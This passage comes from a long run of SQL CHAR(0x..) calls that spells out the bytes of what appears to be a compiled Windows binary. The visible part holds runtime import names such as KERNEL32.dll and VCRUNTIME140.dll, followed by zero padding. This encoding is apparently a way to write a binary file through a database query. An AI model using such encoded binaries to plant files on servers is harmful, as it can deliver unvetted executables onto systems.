00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x44),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x60),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x7a),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x90),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xa6),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xc0),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xdc),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf2),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x14),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2c),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x68),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x74),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x82),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x94),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xae),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xd0),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xec),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x3e),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xd3),CHAR(0x04),CHAR(0x52),CHAR(0x74),CHAR(0x6c),CHAR(0x43),CHAR(0x61),CHAR(0x70),CHAR(0x74),CHAR(0x75),CHAR(0x72),CHAR(0x65),CHAR(0x43),CHAR(0x6f),CHAR(0x6e),CHAR(0x74),CHAR(0x65),CHAR(0x78),CHAR(0x74),CHAR(0x00),CHAR(0xda),CHAR(0x04),CHAR(0x52),CHAR(0x74),CHAR(0x6c),CHAR(0x4c),CHAR(0x6f),CHAR(0x6f),CHAR(0x6b),CHAR(0x75),CHAR(0x70),CHAR(0x46),CHAR(0x75),CHAR(0x6e),CHAR(0x63),CHAR(0x74),CHAR(0x69),CHAR(0x6f),CHAR(0x6e),CHAR(0x45),CHAR(0x6e),CHAR(0x74),CHAR(0x72),CHAR(0x79),CHAR(0x00),CHAR(0x00),CHAR(0xe1),CHAR(0x04),CHAR(0x52),CHAR(0x74),CHAR(0x6c),CHAR(0x56),CHAR(0x69),CHAR(0x72),CHAR(0x74),CHAR(0x75),CHAR(0x61),CHAR(0x6c),CHAR(0x55),CHAR(0x6e),CHAR(0x77),CHAR(0x69),CHAR(0x6e),CHAR(0x64),CHAR(0x00),CHAR(0x00),CHAR(0xbc),CHAR(0x05),CHAR(0x55),CHAR(0x6e),CHAR(0x68),CHAR(0x61),CHAR(0x6e),CHAR(0x64),CHAR(0x6c),CHAR(0x65),CHAR(0x64),CHAR(0x45),CHAR(0x78),CHAR(0x63),CHAR(0x65),CHAR(0x70),CHAR(0x74),CHAR(0x69),CHAR(0x6f),CHAR(0x6e),CHAR(0x46),CHAR(0x69),CHAR(0x6c),CHAR(0x74),CHAR(0x65),CHAR(0x72),CHAR(0x00),CHAR(0x00),CHAR(0x7b),CHAR(0x05),CHAR(0x53),CHAR(0x65),CHAR(0x74),CHAR(0x55),CHAR(0x6e),CHAR(0x68),CHAR(0x61),CHAR(0x6e),CHAR(0x64),CHAR(0x6c),CHAR(0x65),CHAR(0x64),CHAR(0x45),CHAR(0x78),CHAR(0x63),CHAR(0x65),CHAR(0x70),CHAR(0x74),CHAR(0x69),CHAR(0x6f),CHAR(0x6e),CHAR(0x46),CHAR(0x69),CHAR(0x6c),CHAR(0x74),CHAR(0x65),CHAR(0x72),CHAR(0x00),CHAR(0x1d),CHAR(0x02),CHAR(0x47),CHAR(0x65),CHAR(0x74),CHAR(0x43),CHAR(0x75),CHAR(0x72),CHAR(0x72),CHAR(0x65),CHAR(0x6e),CHAR(0x74),CHAR(0x50),CHAR(0x72),CHAR(0x6f),CHAR(0x63),CHAR(0x65),CHAR(0x73),CHAR(0x73),CHAR(0x00),CHAR(0x9a),CHAR(0x05),CHAR(0x54),CHAR(0x65),CHAR(0x72),CHAR(0x6d),CHAR(0x69),CHAR(0x6e),CHAR(0x61),CHAR(0x74),CHAR(0x65),CHAR(0x50),CHAR(0x72),CHAR(0x6f),CHAR(0x63),CHAR(0x65),CHAR(0x73),CHAR(0x73),CHAR(0x00),CHAR(0x00),CHAR(0x89),CHAR(0x03),CHAR(0x49),CHAR(0x73),CHAR(0x50),CHAR(0x72),CHAR(0x6f),CHAR(0x63),CHAR(0x65),CHAR(0x73),CHAR(0x73),CHAR(0x6f),CHAR(0x72),CHAR(0x46),CHAR(0x65),CHAR(0x61),CHAR(0x74),CHAR(0x75),CHAR(0x72),CHAR(0x65),CHAR(0x50),CHAR(0x72),CHAR(0x65),CHAR(0x73),CHAR(0x65),CHAR(0x6e),CHAR(0x74),CHAR(0x00),CHAR(0x50),CHAR(0x04),CHAR(0x51),CHAR(0x75),CHAR(0x65),CHAR(0x72),CHAR(0x79),CHAR(0x50),CHAR(0x65),CHAR(0x72),CHAR(0x66),CHAR(0x6f),CHAR(0x72),CHAR(0x6d),CHAR(0x61),CHAR(0x6e),CHAR(0x63),CHAR(0x65),CHAR(0x43),CHAR(0x6f),CHAR(0x75),CHAR(0x6e),CHAR(0x74),CHAR(0x65),CHAR(0x72),CHAR(0x00),CHAR(0x1e),CHAR(0x02),CHAR(0x47),CHAR(0x65),CHAR(0x74),CHAR(0x43),CHAR(0x75),CHAR(0x72),CHAR(0x72),CHAR(0x65),CHAR(0x6e),CHAR(0x74),CHAR(0x50),CHAR(0x72),CHAR(0x6f),CHAR(0x63),CHAR(0x65),CHAR(0x73),CHAR(0x73),CHAR(0x49),CHAR(0x64),CHAR(0x00),CHAR(0x22),CHAR(0x22),CHAR(0x02),CHAR(0x47),CHAR(0x65),CHAR(0x74),CHAR(0x43),CHAR(0x75),CHAR(0x72),CHAR(0x72),CHAR(0x65),CHAR(0x6e),CHAR(0x74),CHAR(0x54),CHAR(0x68),CHAR(0x72),CHAR(0x65),CHAR(0x61),CHAR(0x64),CHAR(0x49),CHAR(0x64),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x02),CHAR(0x47),CHAR(0x65),CHAR(0x74),CHAR(0x53),CHAR(0x79),CHAR(0x73),CHAR(0x74),CHAR(0x65),CHAR(0x6d),CHAR(0x54),CHAR(0x69),CHAR(0x6d),CHAR(0x65),CHAR(0x41),CHAR(0x73),CHAR(0x46),CHAR(0x69),CHAR(0x6c),CHAR(0x65),CHAR(0x54),CHAR(0x69),CHAR(0x6d),CHAR(0x65),CHAR(0x00),CHAR(0x22),CHAR(0x22),CHAR(0x01),CHAR(0x44),CHAR(0x69),CHAR(0x73),CHAR(0x61),CHAR(0x62),CHAR(0x6c),CHAR(0x65),CHAR(0x54),CHAR(0x68),CHAR(0x72),CHAR(0x65),CHAR(0x61),CHAR(0x64),CHAR(0x4c),CHAR(0x69),CHAR(0x62),CHAR(0x72),CHAR(0x61),CHAR(0x72),CHAR(0x79),CHAR(0x43),CHAR(0x61),CHAR(0x6c),CHAR(0x6c),CHAR(0x73),CHAR(0x00),CHAR(0x6c),CHAR(0x03),CHAR(0x49),CHAR(0x6e),CHAR(0x69),CHAR(0x74),CHAR(0x69),CHAR(0x61),CHAR(0x6c),CHAR(0x69),CHAR(0x7a),CHAR(0x65),CHAR(0x53),CHAR(0x4c),CHAR(0x69),CHAR(0x73),CHAR(0x74),CHAR(0x48),CHAR(0x65),CHAR(0x61),CHAR(0x64),CHAR(0x00),CHAR(0x82),CHAR(0x03),CHAR(0x49),CHAR(0x73),CHAR(0x44),CHAR(0x65),CHAR(0x62),CHAR(0x75),CHAR(0x67),CHAR(0x67),CHAR(0x65),CHAR(0x72),CHAR(0x50),CHAR(0x72),CHAR(0x65),CHAR(0x73),CHAR(0x65),CHAR(0x6e),CHAR(0x74),CHAR(0x00),CHAR(0x4b),CHAR(0x45),CHAR(0x52),CHAR(0x4e),CHAR(0x45),CHAR(0x4c),CHAR(0x33),CHAR(0x32),CHAR(0x2e),CHAR(0x64),CHAR(0x6c),CHAR(0x6c),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x5f),CHAR(0x5f),CHAR(0x43),CHAR(0x5f),CHAR(0x73),CHAR(0x70),CHAR(0x65),CHAR(0x63),CHAR(0x69),CHAR(0x66),CHAR(0x69),CHAR(0x63),CHAR(0x5f),CHAR(0x68),CHAR(0x61),CHAR(0x6e),CHAR(0x64),CHAR(0x6c),CHAR(0x65),CHAR(0x72),CHAR(0x00),CHAR(0x00),CHAR(0x25),CHAR(0x00),CHAR(0x5f),CHAR(0x5f),CHAR(0x73),CHAR(0x74),CHAR(0x64),CHAR(0x5f),CHAR(0x74),CHAR(0x79),CHAR(0x70),CHAR(0x65),CHAR(0x5f),CHAR(0x69),CHAR(0x6e),CHAR(0x66),CHAR(0x6f),CHAR(0x5f),CHAR(0x64),CHAR(0x65),CHAR(0x73),CHAR(0x74),CHAR(0x72),CHAR(0x6f),CHAR(0x79),CHAR(0x5f),CHAR(0x6c),CHAR(0x69),CHAR(0x73),CHAR(0x74),CHAR(0x00),CHAR(0x00),CHAR(0x3e),CHAR(0x00),CHAR(0x6d),CHAR(0x65),CHAR(0x6d),CHAR(0x73),CHAR(0x65),CHAR(0x74),CHAR(0x00),CHAR(0x00),CHAR(0x56),CHAR(0x43),CHAR(0x52),CHAR(0x55),CHAR(0x4e),CHAR(0x54),CHAR(0x49),CHAR(0x4d),CHAR(0x45),CHAR(0x31),CHAR(0x34),CHAR(0x30),CHAR(0x2e),CHAR(0x64),CHAR(0x6c),CHAR(0x6c),CHAR(0x00),CHAR(0x00),CHAR(0x36),CHAR(0x00),CHAR(0x5f),CHAR(0x69),CHAR(0x6e),CHAR(0x69),CHAR(0x74),CHAR(0x74),CHAR(0x65),CHAR(0x72),CHAR(0x6d),CHAR(0x00),CHAR(0x37),CHAR(0x00),CHAR(0x5f),CHAR(0x69),CHAR(0x6e),CHAR(0x69),CHAR(0x74),CHAR(0x74),CHAR(0x65),CHAR(0x72),CHAR(0x6d),CHAR(0x5f),CHAR(0x65),CHAR(0x00),CHAR(0x3f),CHAR(0x00),CHAR(0x5f),CHAR(0x73),CHAR(0x65),CHAR(0x68),CHAR(0x5f),CHAR(0x66),CHAR(0x69),CHAR(0x6c),CHAR(0x74),CHAR(0x65),CHAR(0x72),CHAR(0x5f),CHAR(0x64),CHAR(0x6c),CHAR(0x6c),CHAR(0x00),CHAR(0x18),CHAR(0x00),CHAR(0x5f),CHAR(0x63),CHAR(0x6f),CHAR(0x6e),CHAR(0x66),CHAR(0x69),CHAR(0x67),CHAR(0x75),CHAR(0x72),CHAR(0x65),CHAR(0x5f),CHAR(0x6e),CHAR(0x61),CHAR(0x72),CHAR(0x72),CHAR(0x6f),CHAR(0x77),CHAR(0x5f),CHAR(0x61),CHAR(0x72),CHAR(0x67),CHAR(0x76),CHAR(0x00),CHAR(0x00),CHAR(0x33),CHAR(0x00),CHAR(0x5f),CHAR(0x69),CHAR(0x6e),CHAR(0x69),CHAR(0x74),CHAR(0x69),CHAR(0x61),CHAR(0x6c),CHAR(0x69),CHAR(0x7a),CHAR(0x65),CHAR(0x5f),CHAR(0x6e),CHAR(0x61),CHAR(0x72),CHAR(0x72),CHAR(0x6f),CHAR(0x77),CHAR(0x5f),CHAR(0x65),CHAR(0x6e),CHAR(0x76),CHAR(0x69),CHAR(0x72),CHAR(0x6f),CHAR(0x6e),CHAR(0x6d),CHAR(0x65),CHAR(0x6e),CHAR(0x74),CHAR(0x00),CHAR(0x00),CHAR(0x34),CHAR(0x00),CHAR(0x5f),CHAR(0x69),CHAR(0x6e),CHAR(0x69),CHAR(0x74),CHAR(0x69),CHAR(0x61),CHAR(0x6c),CHAR(0x69),CHAR(0x7a),CHAR(0x65),CHAR(0x5f),CHAR(0x6f),CHAR(0x6e),CHAR(0x65),CHAR(0x78),CHAR(0x69),CHAR(0x74),CHAR(0x5f),CHAR(0x74),CHAR(0x61),CHAR(0x62),CHAR(0x6c),CHAR(0x65),CHAR(0x00),CHAR(0x00),CHAR(0x22),CHAR(0x22),CHAR(0x00),CHAR(0x5f),CHAR(0x65),CHAR(0x78),CHAR(0x65),CHAR(0x63),CHAR(0x75),CHAR(0x74),CHAR(0x65),CHAR(0x5f),CHAR(0x6f),CHAR(0x6e),CHAR(0x65),CHAR(0x78),CHAR(0x69),CHAR(0x74),CHAR(0x5f),CHAR(0x74),CHAR(0x61),CHAR(0x62),CHAR(0x6c),CHAR(0x65),CHAR(0x00),CHAR(0x16),CHAR(0x00),CHAR(0x5f),CHAR(0x63),CHAR(0x65),CHAR(0x78),CHAR(0x69),CHAR(0x74),CHAR(0x00),CHAR(0x00),CHAR(0x61),CHAR(0x70),CHAR(0x69),CHAR(0x2d),CHAR(0x6d),CHAR(0x73),CHAR(0x2d),CHAR(0x77),CHAR(0x69),CHAR(0x6e),CHAR(0x2d),CHAR(0x63),CHAR(0x72),CHAR(0x74),CHAR(0x2d),CHAR(0x72),CHAR(0x75),CHAR(0x6e),CHAR(0x74),CHAR(0x69),CHAR(0x6d),CHAR(0x65),CHAR(0x2d),CHAR(0x6c),CHAR(0x31),CHAR(0x2d),CHAR(0x31),CHAR(0x2d),CHAR(0x30),CHAR(0x2e),CHAR(0x64),CHAR(0x6c),CHAR(0x6c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xcd),CHAR(0x5d),CHAR(0x20),CHAR(0xd2),CHAR(0x66),CHAR(0xd4),CHAR(0xff),CHAR(0xff),CHAR(0x32),CHAR(0xa2),CHAR(0xdf),CHAR(0x2d),CHAR(0x99),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2f),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR